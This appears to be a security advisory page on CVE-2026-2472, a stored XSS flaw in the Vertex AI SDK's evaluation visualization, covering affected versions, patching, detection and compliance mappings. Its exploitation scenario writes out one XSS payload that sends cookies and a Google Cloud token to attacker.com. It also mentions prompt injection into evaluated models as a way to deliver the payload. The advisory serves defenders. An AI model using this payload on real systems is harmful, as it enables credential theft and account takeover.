CVE-2026-2472: Vertex AI SDK XSS enables session

CISO Take

If your ML engineers use Vertex AI SDK's evaluation visualization in Jupyter or Colab, upgrade google-cloud-aiplatform to 1.131.0 immediately. An attacker who can influence model evaluation inputs or dataset content can execute arbitrary JavaScript in your engineers' browser sessions, enabling cloud credential theft and account takeover. Risk is highest for teams evaluating LLMs against external, user-supplied, or third-party data sources—a public PoC already exists on GitHub.

What is the risk?

High business impact despite low EPSS (0.00064) and no CISA KEV inclusion. Jupyter and Colab environments are disproportionately dangerous XSS targets: they routinely hold Google Cloud OAuth tokens, service account keys, and direct access to production data pipelines and model artifacts. The attack requires no authentication—only the ability to influence evaluation dataset content or model outputs, which is achievable via adversarial prompts, poisoned datasets, or indirect prompt injection into evaluated models. A public PoC (github.com/JoshuaProvoste/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud) lowers the exploitation bar further. No confirmed active exploitation in the wild as of analysis date.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
Vertex AI SDK	pip	>= 1.98.0, < 1.131.0	`1.131.0`
901 OpenSSF 6.1 520 dependents Pushed 4d ago 100% patched ~5d to patch Full package profile →

Do you use Vertex AI SDK? You're affected.

How severe is it?

CVSS 3.1

N/A

EPSS

0.5%

chance of exploitation in 30 days

Higher than 40% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

No known exploitation

Sophistication

Moderate

What should I do?

6 steps

PATCH (immediate): Upgrade google-cloud-aiplatform to >= 1.131.0 — pip install --upgrade google-cloud-aiplatform. Verify with pip show google-cloud-aiplatform.
WORKAROUND

Until patched, prohibit use of _genai/_evals_visualization with evaluation results sourced from untrusted, external, or user-supplied data.
DETECTION

Scan evaluation datasets and model outputs for script tags, JavaScript event handlers (onerror, onload, onclick), and javascript: URI schemes before visualization. Add pre-render output sanitization.
INPUT CONTROL

Treat all external data sources fed into evaluation pipelines as untrusted; apply allowlist-based content validation.
CREDENTIAL HYGIENE

If exposure is suspected, rotate Google Cloud service account keys, OAuth tokens, and API keys stored in any potentially affected Jupyter/Colab sessions.
SCOPE

Check all repositories and CI/CD pipelines that run evaluation notebooks for the vulnerable SDK version range.

What does CISA's SSVC say?

Decision Track

Exploitation none

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Data Extraction Supply Chain Framework API AML.T0010.001 - AI Software AML.T0011 - User Execution AML.T0020 - Poison Training Data AML.T0025 - Exfiltration via Cyber Means AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0055 - Unsecured Credentials AML.T0078 - Drive-by Compromise

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, robustness and cybersecurity Article 15 - Accuracy, Robustness and Cybersecurity

ISO 42001

A.6.2.3 - AI system inputs A.6.2.6 - AI System Security A.8.4 - AI Data Quality and Integrity

NIST AI RMF

GOVERN 6.1 - Policies and procedures are in place that address AI risks associated with third-party entities MANAGE 2.2 - Mechanisms are in place and applied to sustain the value of deployed AI systems MANAGE-2.2 - Mechanisms to respond to AI risks

OWASP LLM Top 10

LLM02 - Insecure Output Handling LLM02:2025 - Insecure Output Handling

Frequently Asked Questions

What is CVE-2026-2472?

If your ML engineers use Vertex AI SDK's evaluation visualization in Jupyter or Colab, upgrade google-cloud-aiplatform to 1.131.0 immediately. An attacker who can influence model evaluation inputs or dataset content can execute arbitrary JavaScript in your engineers' browser sessions, enabling cloud credential theft and account takeover. Risk is highest for teams evaluating LLMs against external, user-supplied, or third-party data sources—a public PoC already exists on GitHub.

Is CVE-2026-2472 actively exploited?

No confirmed active exploitation of CVE-2026-2472 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-2472?

1. PATCH (immediate): Upgrade google-cloud-aiplatform to >= 1.131.0 — pip install --upgrade google-cloud-aiplatform. Verify with pip show google-cloud-aiplatform. 2. WORKAROUND: Until patched, prohibit use of _genai/_evals_visualization with evaluation results sourced from untrusted, external, or user-supplied data. 3. DETECTION: Scan evaluation datasets and model outputs for script tags, JavaScript event handlers (onerror, onload, onclick), and javascript: URI schemes before visualization. Add pre-render output sanitization. 4. INPUT CONTROL: Treat all external data sources fed into evaluation pipelines as untrusted; apply allowlist-based content validation. 5. CREDENTIAL HYGIENE: If exposure is suspected, rotate Google Cloud service account keys, OAuth tokens, and API keys stored in any potentially affected Jupyter/Colab sessions. 6. SCOPE: Check all repositories and CI/CD pipelines that run evaluation notebooks for the vulnerable SDK version range.

What systems are affected by CVE-2026-2472?

This vulnerability affects the following AI/ML architecture patterns: model evaluation pipelines, AI development workspaces, Vertex AI workflows, Jupyter and Colab ML environments, LLM evaluation frameworks, automated ML pipelines with visualization.

What is the CVSS score for CVE-2026-2472?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

model evaluation pipelinesAI development workspacesVertex AI workflowsJupyter and Colab ML environmentsLLM evaluation frameworksautomated ML pipelines with visualization

MITRE ATLAS Techniques

AML.T0010.001 AI Software

AML.T0011 User Execution

AML.T0020 Poison Training Data

AML.T0025 Exfiltration via Cyber Means

AML.T0049 Exploit Public-Facing Application

AML.T0050 Command and Scripting Interpreter

AML.T0055 Unsecured Credentials

AML.T0078 Drive-by Compromise

Compliance Controls Affected

EU AI Act: Art. 15, Article 15

ISO 42001: A.6.2.3, A.6.2.6, A.8.4

NIST AI RMF: GOVERN 6.1, MANAGE 2.2, MANAGE-2.2

OWASP LLM Top 10: LLM02, LLM02:2025

What are the technical details?

Original Advisory

Stored Cross-Site Scripting (XSS) in the _genai/_evals_visualization component of Google Cloud Vertex AI SDK (google-cloud-aiplatform) versions from 1.98.0 up to (but not including) 1.131.0 allows an unauthenticated remote attacker to execute arbitrary JavaScript in a victim's Jupyter or Colab environment via injecting script escape sequences into model evaluation results or dataset JSON data.

Exploitation Scenario

An attacker targets a company running LLM evaluations on Vertex AI. They submit an adversarial evaluation dataset entry with a JSON string value containing a stored XSS payload: '<img src=x onerror=fetch("https://attacker.com/exfil?t="+btoa(document.cookie+localStorage.getItem("gcloud_token")))>'. The poisoned dataset is fed into a Vertex AI model evaluation job. When the ML engineer opens the _genai/_evals_visualization dashboard in Jupyter to review results, the payload fires silently, exfiltrating the engineer's Google Cloud OAuth token and session cookies to the attacker. The attacker uses the stolen token to authenticate to GCS, enumerate Vertex AI model artifacts, and pivot to Cloud SQL or BigQuery—all without triggering authentication alerts, since they are using a legitimate token.

Weaknesses (CWE)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Primary

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

[Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
[Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca

Source: MITRE CWE corpus.